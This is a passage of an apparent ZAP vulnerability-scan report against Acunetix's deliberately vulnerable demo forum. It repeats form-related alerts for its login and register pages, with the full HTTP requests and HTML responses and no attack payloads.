class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=83 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 407 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Templatize.asp?item=html/about.html Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:39 GMT Content-Length: 3256 |
Response Body - size: 3,256 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=/Default.asp? |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=/Default.asp? HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:46 GMT Content-Length: 3124 |
Response Body - size: 3,124 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FDefault%2Easp%3F" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:38 GMT Content-Length: 3615 |
Response Body - size: 3,615 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 355 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:39 GMT Content-Length: 3613 |
Response Body - size: 3,613 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 525 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=YKSrENiG Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:01:19 GMT Content-Length: 3651 |
Response Body - size: 3,651 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 382 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:46 GMT Content-Length: 3554 |
Response Body - size: 3,554 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and 